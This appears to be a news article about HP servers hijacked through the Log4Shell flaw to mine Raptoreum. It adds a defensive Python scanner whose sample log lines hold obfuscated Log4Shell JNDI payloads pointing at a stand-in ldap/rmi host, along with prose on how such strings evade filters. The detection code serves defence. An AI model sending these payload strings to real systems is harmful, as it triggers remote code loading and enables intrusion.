A group of HP-branded servers was recently compromised and used to mine a cryptocurrency named Raptoreum. For a period, the compromised HP machines were the single largest contributor of hash power to the coin's network, which let the attackers rake in about $110,000. A report indicates that the tokens were mined between December 9th and December 17th. The servers belonged to an undisclosed company, and the attackers repurposed the hardware for mining. Raptoreum, the coin the attackers chose, sits in the top 1,000 coins by market capitalization.
The cryptocurrency uses a hashing algorithm called GhostRider, a proof-of-work algorithm designed to favour CPU mining, which is what makes general-purpose server hardware attractive to cryptojackers. On December 9th, the server cluster started mining Raptoreum and at that point was providing more hash power than every other miner on the Raptoreum network combined, which is what let the attackers collect coins worth more than $110,000. On December 17th, the cluster dropped off the network, which suggests the intrusion was detected and the servers were patched or taken offline. The attack used the recently disclosed Log4Shell vulnerability (CVE-2021-44228), which lets an attacker execute code remotely on an affected system.
Log4Shell is a flaw in Log4j, an Apache logging library used in a very large number of Java applications. The vulnerability was disclosed in early December and was used here to get crypto-mining software executed on the servers. It was rated critical (the maximum CVSS score of 10.0) because the library is so widespread, including in products from large vendors such as IBM and Microsoft. Although many affected deployments have been patched, attackers keep finding new ways to trigger the flaw and to get malicious lookup strings past filters that only look for the literal text "jndi".
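As an added example (not code from the original article or from any of the parties it describes), the following Python scanner shows the kind of check a defender would run over web or application logs. It emulates Log4j's innermost-first lookup resolution, so obfuscated forms such as `${${lower:j}ndi:...}` and `${${::-j}ndi:...}` normalise to a plain `${jndi:...}` before matching, which a naive substring search for "jndi" would miss. The log lines and the IP addresses in them are constructed for this example (documentation ranges, not real indicators); the handful of lookup forms resolved here (`lower`, `upper` and the `:-` default syntax) are an assumption about which evasions matter, not a complete emulation of Log4j.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Innermost ${...} lookup: contains no nested "${" and no "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: ${jndi:<scheme>:<target>}. Log4j matches the
# "jndi" prefix case-insensitively, so we do too.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):([^}]*)\}", re.IGNORECASE)


def _resolve_one(body: str) -> Optional[str]:
    """Emulate Log4j 2.x evaluation of one innermost lookup for the
    evasion-relevant forms only. Returns None for a JNDI lookup (kept intact
    so it can be matched) and for lookups this example does not model."""
    if body.lower().startswith("jndi:"):
        return None
    if ":-" in body:
        # Default-value syntax: ${foo:-bar} -> "bar"; ${::-j} -> "j";
        # ${env:NaN:-j} -> "j" (the variable is unset, so the default wins).
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if not sep:
        return None
    p = prefix.strip().lower()
    if p == "lower":
        return arg.lower()
    if p == "upper":
        return arg.upper()
    return None  # e.g. ${date:yyyy}: leave as-is, it is not an evasion


def normalize(line: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups innermost-first, like Log4j's substitutor,
    until nothing changes or the round limit is hit (bounded on purpose so
    a crafted line cannot make the scanner loop)."""
    for _ in range(max_rounds):
        changed = [False]

        def repl(m: "re.Match[str]") -> str:
            resolved = _resolve_one(m.group(1))
            if resolved is None:
                return m.group(0)
            changed[0] = True
            return resolved

        line = _INNERMOST.sub(repl, line)
        if not changed[0]:
            break
    return line


@dataclass
class Finding:
    line_no: int      # 1-based index into the scanned input
    scheme: str       # ldap, ldaps, rmi, dns, iiop, ...
    target: str       # everything after "<scheme>:" up to the closing brace
    normalized: str   # the de-obfuscated line, for the analyst


def scan(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per JNDI lookup found after de-obfuscation."""
    findings: List[Finding] = []
    for i, raw in enumerate(lines, 1):
        norm = normalize(raw)
        for m in _JNDI.finditer(norm):
            findings.append(Finding(i, m.group(1).lower(), m.group(2), norm))
    return findings


# Constructed sample access-log lines (hypothetical, not from the incident).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:15:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:rmi}://198.51.100.7:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:03:16:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/y}"',
    'app: user "${date:yyyy}" logged in',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: jndi via {f.scheme} -> {f.target}")
```

Run as a script it reports lines 2, 3 and 4; only line 2 would be caught by a plain search for `${jndi:`. The scanner deliberately leaves unknown lookups such as `${env:X}` untouched rather than resolving them, since on the scanning host those would resolve to different values than on the victim; a JNDI lookup wrapped around an unresolved inner lookup is still matched because the outer pattern tolerates `${` inside the target.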
It has also emerged that the flaw can be triggered through local vectors: a server does not have to be exposed to the internet, because any attacker-controlled string that ends up being logged, from whatever source, can carry the malicious lookup. In the first half of the year the number of cryptojacking attacks fell for the first time since 2018, according to the 'Cloud Threat Report' published by Unit 42, the threat research arm of Palo Alto Networks. In a follow-up report, however, the same team found that almost 63% of the third-party code templates used to build cloud infrastructure contained insecure configurations.
Such insecure templates matter because a misconfigured deployment can hand an attacker control of the underlying resources, which makes them very risky. Cryptojacking is certainly not a new phenomenon and has done a lot of damage in the crypto space. Many people and systems have suffered from it over the years, and it may be slowing down as defenders become more diligent. Nonetheless, this incident involving HP-branded servers shows that a newly disclosed vulnerability has to be patched quickly, or things can get out of hand very fast, even for large companies.